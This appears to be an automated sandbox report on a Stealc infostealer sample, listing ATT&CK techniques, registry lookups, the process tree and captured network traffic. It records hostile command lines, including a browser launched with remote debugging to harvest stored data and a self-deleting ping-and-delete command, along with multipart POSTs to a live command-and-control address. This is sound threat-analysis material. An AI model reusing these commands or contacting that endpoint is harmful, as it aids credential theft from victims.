stealc | 0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1

pid	Process
2828	chrome.exe
3252	msedge.exe
5100	msedge.exe
3612	msedge.exe
2412	msedge.exe
4052	chrome.exe
3288	chrome.exe
1336	msedge.exe
968	chrome.exe
2512	chrome.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	BGHCGCAEBF.exe

Executes dropped EXE 1 IoCs

pid	Process
1648	BGHCGCAEBF.exe

Loads dropped DLL 2 IoCs

pid	Process
2604	0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
2604	0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
900	2604	WerFault.exe	82

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BGHCGCAEBF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4848	cmd.exe
2076	PING.EXE

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133784577289632144"	chrome.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2076	PING.EXE

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
2604	0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
2604	0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
2604	0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
2604	0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
968	chrome.exe
968	chrome.exe
2604	0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
2604	0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
2604	0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
2604	0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
2536	msedge.exe
2536	msedge.exe
2536	msedge.exe
2536	msedge.exe
2536	msedge.exe
2536	msedge.exe
2536	msedge.exe
3976	msedge.exe
3976	msedge.exe
3252	msedge.exe
3252	msedge.exe
2604	0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
2604	0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeShutdownPrivilege	968	chrome.exe
Token: SeCreatePagefilePrivilege	968	chrome.exe
Token: SeShutdownPrivilege	968	chrome.exe
Token: SeCreatePagefilePrivilege	968	chrome.exe
Token: SeShutdownPrivilege	968	chrome.exe
Token: SeCreatePagefilePrivilege	968	chrome.exe
Token: SeShutdownPrivilege	968	chrome.exe
Token: SeCreatePagefilePrivilege	968	chrome.exe
Token: SeShutdownPrivilege	968	chrome.exe
Token: SeCreatePagefilePrivilege	968	chrome.exe
Token: SeShutdownPrivilege	968	chrome.exe
Token: SeCreatePagefilePrivilege	968	chrome.exe

Suspicious use of FindShellTrayWindow 51 IoCs

pid	Process
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
968	chrome.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2604 wrote to memory of 968	2604	0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe	83
PID 2604 wrote to memory of 968	2604	0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe	83
PID 968 wrote to memory of 4132	968	chrome.exe	84
PID 968 wrote to memory of 4132	968	chrome.exe	84
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 5108	968	chrome.exe	85
PID 968 wrote to memory of 3588	968	chrome.exe	86
PID 968 wrote to memory of 3588	968	chrome.exe	86
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87
PID 968 wrote to memory of 2160	968	chrome.exe	87

C:\Users\Admin\AppData\Local\Temp\0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe
"C:\Users\Admin\AppData\Local\Temp\0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
  2⤵
  - Uses browser remote debugging
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:968
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff83ccccc40,0x7ff83ccccc4c,0x7ff83ccccc58
    3⤵
    PID:4132
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1960,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1956 /prefetch:2
    3⤵
    PID:5108
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1908,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2128 /prefetch:3
    3⤵
    PID:3588
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2216,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2376 /prefetch:8
    3⤵
    PID:2160
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:4052
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3224 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:3288
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3596,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4460 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:2512
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4760,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4764 /prefetch:8
    3⤵
    PID:2608
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4968,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4972 /prefetch:8
    3⤵
    PID:2756
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4992,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5020 /prefetch:8
    3⤵
    PID:2548
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5140,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5144 /prefetch:8
    3⤵
    PID:368
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5060,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5084 /prefetch:8
    3⤵
    PID:4916
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5088,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4996 /prefetch:8
    3⤵
    PID:2980
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4988,i,3227440027225670348,14162949856343628137,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4764 /prefetch:2
    3⤵
    - Uses browser remote debugging
    PID:2828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
  2⤵
  - Uses browser remote debugging
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  PID:3252
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff83d9846f8,0x7ff83d984708,0x7ff83d984718
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:2536
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,16000371545025497674,6983908077783381889,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
    3⤵
    PID:3448
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,16000371545025497674,6983908077783381889,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2500 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3976
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,16000371545025497674,6983908077783381889,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:8
    3⤵
    PID:3768
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2076,16000371545025497674,6983908077783381889,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:3612
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2076,16000371545025497674,6983908077783381889,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:5100
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2076,16000371545025497674,6983908077783381889,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:2412
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2076,16000371545025497674,6983908077783381889,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:1336
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\BGHCGCAEBF.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4708
- - C:\Users\Admin\AppData\Roaming\BGHCGCAEBF.exe
    "C:\Users\Admin\AppData\Roaming\BGHCGCAEBF.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1648
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Roaming\BGHCGCAEBF.exe
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      PID:4848
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 2.2.2.2 -n 1 -w 3000
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2076
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 2572
  2⤵
  - Program crash
  PID:900

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2604 -ip 2604
1⤵
PID:2864

Network

DNS

232.168.11.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.168.11.51.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
GET

http://92.255.57.89/

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

GET / HTTP/1.1
Host: 92.255.57.89
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:24 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://92.255.57.89/45c616e921a794b8.php

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

POST /45c616e921a794b8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJ
Host: 92.255.57.89
Content-Length: 214
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:24 GMT
Server: Apache/2.4.58 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 180
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://92.255.57.89/45c616e921a794b8.php

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

POST /45c616e921a794b8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAFBFCBGHDGCFHJJECAF
Host: 92.255.57.89
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:25 GMT
Server: Apache/2.4.58 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2028
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://92.255.57.89/45c616e921a794b8.php

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

POST /45c616e921a794b8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC
Host: 92.255.57.89
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:25 GMT
Server: Apache/2.4.58 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 7116
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://92.255.57.89/45c616e921a794b8.php

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

POST /45c616e921a794b8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBFHCGCGDAAKFIECFHDB
Host: 92.255.57.89
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 12 Dec 2024 06:15:25 GMT
Server: Apache/2.4.58 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 108
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://92.255.57.89/45c616e921a794b8.php

0f061497c5ead3891e927963ca02fd10a51ac596c820468f15556a793e9429a1.exe

Remote address:

92.255.57.89:80

Request

